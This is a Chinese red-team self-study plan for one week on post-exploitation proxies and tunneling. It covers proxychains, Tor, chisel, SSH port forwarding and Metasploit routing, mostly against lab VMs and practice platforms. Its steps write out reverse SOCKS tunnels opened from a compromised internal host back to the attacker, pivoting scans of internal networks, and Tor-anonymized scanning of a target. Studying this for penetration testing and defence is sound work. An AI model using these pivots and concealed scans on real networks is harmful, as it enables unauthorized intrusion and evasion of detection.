================================================================================
第23周：代理与隧道技术 (后渗透期)
================================================================================

【本周围绕的核心渗透案例阶段】
引用红队队员完整学习手册中的案例：
后渗透阶段——攻击者在完成目标网络边界设备提权后，需要对内网进行
横向渗透。但攻击者的控制端在公网，目标内网不可直接从公网访问。
此时需要利用已攻陷的边界主机作为跳板，搭建代理和隧道穿透内网。

【本周学习目标】
1. 理解代理(Proxy)与隧道(Tunnel)的概念区别和适用场景
2. 熟练掌握proxychains配置与使用，实现任意TCP工具的代理化
3. 理解Tor网络原理，掌握Tor+proxychains组合实现隐蔽通信
4. 熟练使用chisel进行内网隧道的建立和管理
5. 掌握SSH端口转发的三种模式：本地转发(L)、远程转发(R)、动态转发(D)
6. 能够搭建多层跳板环境并测试完整的代理链

【本周知识清单】
- 代理技术对比：HTTP代理 vs SOCKS4 vs SOCKS5
- proxychains原理：LD_PRELOAD劫持connect()系统调用
- proxychains配置项：dynamic_chain/random_chain/strict_chain、proxy_dns
- Tor匿名网络原理：入口节点→中间节点→出口节点 三层加密
- Tor Hidden Service (.onion)基础
- chisel：基于HTTP的TCP隧道工具，支持反向连接
- SSH端口转发三种模式：
  - 本地转发 -L: local_port:remote_host:remote_port
  - 远程转发 -R: remote_port:local_host:local_port
  - 动态转发 -D: SOCKS代理端口
- SSH跳板(ProxyJump/JumpHost)配置
- 多层代理链构建方法
- ICMP隧道、DNS隧道、HTTP(S)隧道的基础概念
- NTLM代理认证环境下的工具配置

【本周工具清单】
- proxychains — TCP代理链包装工具
- Tor (tor service) — 匿名网络客户端
- chisel — 跨平台HTTP隧道工具
- OpenSSH — SSH客户端(自带端口转发能力)
- socat — 多功能网络中继工具
- nmap + proxychains — 通过代理链进行端口扫描
- Metasploit: route add + socks_proxy — MSF内置代理
- frp — 反向代理工具(备选学习)
- gost — GO语言多协议代理隧道(备选学习)
- tunna / reGeorg — HTTP CONNECT隧道工具
- ptunnel / icmptunnel — ICMP隧道工具(备选)
- dnscat2 / iodine — DNS隧道工具(备选)

================================================================================
周一：proxychains使用
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：代理基础与proxychains详解
    - 代理类型：正向代理(Forward Proxy) vs 反向代理(Reverse Proxy)
    - 正向代理工作流：Client → Proxy → Target
    - SOCKS4 vs SOCKS5 差异：SOCKS5支持认证、UDP和DNS
    - SOCKS代理通信协议概要
    - proxychains工作原理：LD_PRELOAD劫持connect()调用
    - proxychains配置详解：
      - /etc/proxychains.conf 或 ~/.proxychains/proxychains.conf
      - dynamic_chain vs strict_chain vs random_chain
      - proxy_dns: 通过代理解析DNS防止DNS泄漏
      - tcp_read_time_out / tcp_connect_time_out 调优
      - 代理列表格式：类型 IP 端口 [用户名 密码]
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：proxychains配置与实践
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt
  实验环境：攻击机 + 靶机网络（2台以上虚拟机组成内网测试环境）

  操作步骤：
    Step 1: 配置proxychains代理列表
      sudo vim /etc/proxychains.conf
      在[ProxyList]末尾添加SOCKS代理:
        socks4 127.0.0.1 9050
      修改代理链模式为dynamic_chain
    Step 2: 验证proxychains工作原理
      不使用代理: curl ifconfig.me → 返回攻击机真实公网IP
      使用代理: proxychains curl ifconfig.me → 应返回代理出口IP
    Step 3: proxychains+nmap扫描内网
      搭建实验: 攻击机→跳板机(192.168.1.50)→内网靶机(10.0.0.10)
      在跳板机上建立SOCKS代理(使用ssh -D 1080)
      配置proxychains使用socks5 127.0.0.1 1080
      执行扫描: proxychains nmap -sT -Pn 10.0.0.10
      注意: SYN扫描(-sS)不支持proxychains，需用-sT
    Step 4: proxychains+firefox通过代理访问内网Web
      启动firefox: proxychains firefox
      访问内网靶机的Web服务: http://10.0.0.10:80
    Step 5: 测试代理链(多级代理)
      搭建两级代理: 攻击机→跳板A→跳板B→内网
      配置proxychains使用级联代理
      proxychains nmap -sT 内网目标IP
      对比不同链长度对速度的影响
    Step 6: 使用Metasploit的route+socks_proxy模块
      msfconsole
      在Meterpreter session中: route add 10.0.0.0/24 1
      background session, 使用auxiliary/server/socks_proxy
      配置proxychains使用MSF的SOCKS代理

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：掌握proxychains配置和代理链扫描方法
  - 遇到问题：____________________
  - 明日计划：学习Tor网络原理及与proxychains的集成

================================================================================
周二：Tor网络与隐蔽通信
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：Tor网络原理与隐蔽通信
    - Tor匿名网络架构：洋葱路由(Onion Routing)三层加密
    - Tor节点类型：Entry/Guard Node → Middle Node → Exit Node
    - Tor电路(Circuit)建立过程：逐跳协商密钥
    - Tor配置文件 /etc/tor/torrc 关键配置项
      - SOCKSPort 9050: SOCKS代理监听端口
      - ControlPort 9051: Tor控制端口
      - ExitNodes / StrictNodes: 出口节点控制
      - ExcludeNodes: 排除节点
      - HiddenServiceDir / HiddenServicePort: 洋葱服务配置
    - Tor与proxychains组合：隐蔽代理链
    - Tor Hidden Service (.onion地址) 原理
    - Tor使用的安全注意事项：
      - DNS泄漏、WebRTC泄漏、浏览器指纹
      - 出口节点的流量嗅探风险
      - 传输明文协议（HTTP, FTP, Telnet）的风险
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：Tor安装、配置与隐蔽通信实践
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt

  操作步骤：
    Step 1: 安装和启动Tor服务
      sudo apt install tor
      sudo systemctl start tor
      sudo systemctl status tor (确认正在运行)
      查看tor监听: ss -tlnp | grep 9050 (SOCKS代理在9050端口)
    Step 2: 配置proxychains使用Tor
      sudo vim /etc/proxychains.conf
      在[ProxyList]添加: socks4 127.0.0.1 9050
      (或 socks5 127.0.0.1 9050)
    Step 3: 验证Tor匿名效果
      proxychains curl ifconfig.me
      多次执行观察每次出口IP不同 (Tor电路更换)
      查看当前Tor电路: proxychains curl https://check.torproject.org
    Step 4: Tor+proxychains扫描目标
      proxychains nmap -sT -Pn target.com
      (注意：Tor出口节点扫描可能被目标WAF/IDS识别)
    Step 5: 配置Tor出口节点（选择特定国家出口）
      sudo vim /etc/tor/torrc
      添加: ExitNodes {us} (仅使用美国出口节点)
      重启tor: sudo systemctl restart tor
      验证出口IP地理位置
    Step 6: Tor Hidden Service搭建（了解洋葱服务）
      sudo vim /etc/tor/torrc
      添加: HiddenServiceDir /var/lib/tor/hidden_service/
            HiddenServicePort 80 127.0.0.1:8080
      sudo systemctl restart tor
      查看.onion地址: sudo cat /var/lib/tor/hidden_service/hostname

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：理解Tor三层加密机制，掌握Tor+proxychains组合
  - 遇到问题：____________________
  - 明日计划：学习chisel隧道工具，掌握HTTP反向隧道技术

================================================================================
周三：chisel隧道
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：chisel隧道原理与应用
    - chisel概述：Go语言编写的单二进制HTTP隧道工具
    - chisel工作原理：HTTP/2 multiplexing + SSH over HTTP
    - chisel架构模式：
      - 客户端-服务器架构
      - Server模式：chisel server -p <port>
      - Client模式：chisel client <server:port> <local_port>:<remote_host>:<remote_port>
    - 反向隧道(Reverse Tunnel)原理：
      - 攻击机: chisel server -p 8080 --reverse
      - 目标: chisel client 攻击机IP:8080 R:1080:socks
      - 目标主动连接攻击机，建立反向SOCKS隧道
    - 正向隧道(Forward Tunnel)原理：
      - 目标: chisel server -p 8080
      - 攻击机: chisel client 目标IP:8080 1080:socks
    - 端口转发模式：local_port:remote_host:remote_port
    - chisel认证：--auth参数增加安全性
    - chisel性能：HTTP/2多路复用的优势
    - 与SSH隧道对比：防火墙友好性（走HTTP不是SSH）
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：chisel正向和反向隧道实战
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

  操作步骤：
    Step 1: 下载chisel到攻击机和目标
      攻击机: wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
      解压: gunzip chisel_linux_amd64.gz && chmod +x chisel_linux_amd64
      交叉编译Windows版: GOOS=windows GOARCH=amd64 go build -o chisel.exe
    Step 2: 搭建反向SOCKS隧道
      攻击机(公网): chisel server -p 8080 --reverse
      目标(内网): chisel client 192.168.1.100:8080 R:1080:socks
      验证: 攻击机 netstat -tlnp | grep 1080 (出现SOCKS监听)
    Step 3: 通过反向隧道扫描内网
      配置/etc/proxychains.conf: socks5 127.0.0.1 1080
      proxychains nmap -sT -Pn 10.0.0.0/24
      扫描目标内网网段
    Step 4: chisel单端口转发实践
      场景: 内网主机10.0.0.10的3389端口要通过跳板转发到攻击机
      攻击机: chisel server -p 8080 --reverse
      目标隧道端: chisel client 攻击机:8080 R:33389:10.0.0.10:3389
      攻击机: rdesktop 127.0.0.1:33389 (连接到内网RDP)
    Step 5: chisel正向隧道搭建
      场景: 攻击机可以直接访问目标(非NAT环境)
      目标: chisel server -p 8080
      攻击机: chisel client 目标IP:8080 1080:socks
      攻击机: proxychains nmap -sT 内网IP
    Step 6: chisel多隧道管理
      一个chisel server可以同时管理多个client
      测试同时建立SOCKS隧道和多个端口转发
      观察隧道稳定性（长连接测试）

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：掌握chisel反向/正向隧道搭建，理解HTTP隧道绕过防火墙的优势
  - 遇到问题：____________________
  - 明日计划：学习SSH端口转发三种模式（L/R/D）

================================================================================
周四：SSH端口转发 (L/R/D)
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：SSH端口转发原理与三种模式
    - SSH端口转发概述：利用SSH协议的数据加密通道转发TCP流量
    - 本地端口转发 (-L) 原理：
      ssh -L [bind_address:]local_port:remote_host:remote_port user@ssh_server
      SSH客户端监听local_port → SSH服务器转发到remote_host:remote_port
      典型场景：访问SSH服务器可达的内部服务
    - 远程端口转发 (-R) 原理：
      ssh -R [bind_address:]remote_port:local_host:local_port user@ssh_server
      SSH服务器监听remote_port → SSH客户端转发到local_host:local_port
      典型场景：让公网攻击机访问内网服务（反向穿透）
    - 动态端口转发 (-D) 原理：
      ssh -D [bind_address:]local_port user@ssh_server
      SSH客户端在本地建立SOCKS代理 → 通过SSH服务器访问任意目标
      典型场景：将SSH服务器作为SOCKS代理
    - SSH多级跳板配置：
      ssh -J user1@jump1:port1,user2@jump2:port2 user3@target
      ~/.ssh/config ProxyJump 配置
    - SSH隧道安全加强：
      -N (不执行远程命令), -f (后台运行), -q (静默模式)
      - 使用密钥认证代替密码认证
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：SSH L/R/D三种端口转发实战
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

  操作步骤：
    Step 1: 实验环境准备
      攻击机(192.168.1.100) → 跳板机SSH(192.168.1.50) → 内网Web服务器(10.0.0.10:80)
      确保跳板机SSH服务可用，且已获得凭据
    Step 2: SSH本地端口转发 (-L) 实战
      ssh -L 8080:10.0.0.10:80 user@192.168.1.50
      攻击机浏览器访问: http://127.0.0.1:8080
      验证: 能够访问内网Web服务器的80端口
    Step 3: SSH远程端口转发 (-R) 实战
      场景: 内网主机无法被直接访问，需要反向穿透
      从内网主机执行: ssh -R 2222:127.0.0.1:22 user@192.168.1.100
      攻击机执行: ssh localhost -p 2222 (通过转发连接回内网主机)
      注意: SSH Server需要启用GatewayPorts yes才能让非本地IP连接
    Step 4: SSH动态端口转发 (-D) 实战
      ssh -D 1080 -N -f user@192.168.1.50
      配置proxychains: socks5 127.0.0.1 1080
      测试: proxychains curl http://10.0.0.10:80
      测试内网多目标访问（通过SOCKS代理扫描内网网段）
    Step 5: SSH多级跳板穿透
      场景: 攻击机→跳板A→跳板B→目标
      ssh -J userA@jumpA:22,userB@jumpB:22 -D 1080 -N -f
      或使用~/.ssh/config:
        Host jumpA
          HostName 192.168.1.50
          User userA
        Host jumpB
          HostName 10.0.0.100
          User userB
          ProxyJump jumpA
        Host target
          HostName 10.0.1.50
          User userC
          ProxyJump jumpB
    Step 6: SSH隧道稳定性测试
      autossh -M 0 -f -N -D 1080 user@jump (autossh自动重连)
      对比普通SSH和autossh的稳定性差异

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：掌握SSH三种端口转发模式及其适用场景
  - 遇到问题：____________________
  - 明日计划：搭建多层跳板环境，综合测试代理链

================================================================================
周五：内网穿透综合实战
================================================================================

📚 第1小时 | 理论学习 (09:00 - 10:00)
  学习内容：内网穿透综合方法论
    - 多层内网穿透的典型拓扑：
      公网攻击机 → 边界服务器(DMZ) → 内网A段(办公网) → 内网B段(生产网) → 目标
    - 代理链选择策略：
      - 纯proxychains链：多级SOCKS代理串联
      - 隧道+代理组合：SSH -R + chisel + proxychains
      - Metasploit route链：Meterpreter route add + 多级路由
    - 隧道工具对比与选型决策矩阵：
      - 单端口转发 vs 全流量代理
      - 正向连接 vs 反向连接
      - 防火墙友好程度（HTTP/HTTPS > SSH > 非标准协议）
    - 实战中的常见问题：
      - 代理链超时与性能调优
      - DNS解析穿透问题
      - 多层跳板的会话保活
    - 代理链流量加密层级理解
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt
             /home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

💻 第2小时 | 动手实践 (10:00 - 11:00)
  练习内容：多层跳板环境搭建与代理链测试
  参考文件：/home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt
             /home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

  操作步骤：
    Step 1: 搭建三层网络实验环境
      使用虚拟机创建三层拓扑:
        攻击机(192.168.56.1) → VM-A(192.168.56.101 + 10.0.1.1/24)
        → VM-B(10.0.1.101 + 10.0.2.1/24) → VM-C(10.0.2.101 Web服务)
      共4台虚拟机，每台仅能访问相邻网络
    Step 2: 建立第一层跳板通道
      攻击机→VM-A: SSH连接或建立反向shell
      在攻击机上建立第一层SOCKS: ssh -D 1081 user@192.168.56.101
    Step 3: 建立第二层跳板通道
      通过第一层代理访问VM-A: proxychains ssh -D 1082 user@10.0.1.101
      配置proxychains链: socks5 127.0.0.1 1081 → socks5 127.0.0.1 1082
    Step 4: 访问目标VM-C
      配置proxychains使用双层代理:
        [ProxyList]
        socks5 127.0.0.1 1081
        socks5 127.0.0.1 1082
      测试: proxychains curl http://10.0.2.101
      验证返回VM-C上的Web页面内容
    Step 5: 综合使用chisel+SSH混合隧道
      第一层: chisel反向隧道 (VM-A→攻击机)
      第二层: SSH -D 动态转发 (通过chisel隧道SSH登录VM-B)
      尝试用混合方式完成三层穿透
    Step 6: Metasploit多级路由测试
      获取VM-A的meterpreter session
      route add 10.0.1.0/24 1 (添加第一层路由)
      获取VM-B的meterpreter session (通过第一层路由)
      route add 10.0.2.0/24 2 (添加第二层路由)
      use auxiliary/server/socks_proxy 建立SOCKS代理
      通过proxychains访问VM-C

📝 第3小时 | 复盘总结 (11:00 - 12:00)
  - 今日收获：掌握多层内网穿透和混合代理链搭建技术
  - 遇到问题：____________________
  - 明日计划：复习本周所有内容，在HTB上练习需要隧道穿透的场景

================================================================================
周六：复习日 (2h 复习 + 1h HTB/THM)
================================================================================

📚 复习内容（2小时）
  1. 绘制代理与隧道技术的完整思维导图
  2. 整理proxychains、chisel、SSH转发三种方法的适用场景对比表
  3. 复习SSH -L/-R/-D的命令参数和使用场景
  4. 重新搭建上周的Metasploitable2环境，加入代理隧道练习
  5. 总结本周遇到的所有配置问题和解决方案

💻 HTB/THM练习（1小时）
  - 登录TryHackMe平台
  - 完成 "Wreath" 或 "Internal" 房间（含内网穿透内容）
  - 或选择HTB上需要搭建隧道的内网机器
  - 重点练习从单台机器到内网多台机器的横向移动和代理配置

📝 复习笔记
  - 本周最有效的技术：____________________
  - 需要加强的部分：____________________
  - 下周预习计划：后渗透与持久化（Meterpreter高级功能）

================================================================================
周日：休息日
================================================================================

【本周资源清单】
理论知识文件：
  /home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt
  /home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

实践教程文件：
  /home/a/成长为一个红队/archstrike-proxy教学/01-代理与隐蔽通信.txt
  /home/a/成长为一个红队/archstrike-proxy教学/02-内网隧道与端口转发.txt

在线练习：
  TryHackMe: Wreath, Holo, Internal, Alfred
  HackTheBox: Enterprise, Stealth, BankRobber, Access
  VulnHub: 搭建多虚拟机内网环境练习

工具下载：
  proxychains-ng: https://github.com/rofl0r/proxychains-ng (发行版包管理器安装)
  Tor: sudo apt install tor
  chisel: https://github.com/jpillora/chisel
  autossh: sudo apt install autossh
  socat: sudo apt install socat
  frp: https://github.com/fatedier/frp

【本周完成检查】
[ ] 周一 [ ] 周二 [ ] 周三 [ ] 周四 [ ] 周五
[ ] 周六复习 [ ] 笔记 [ ] 体能
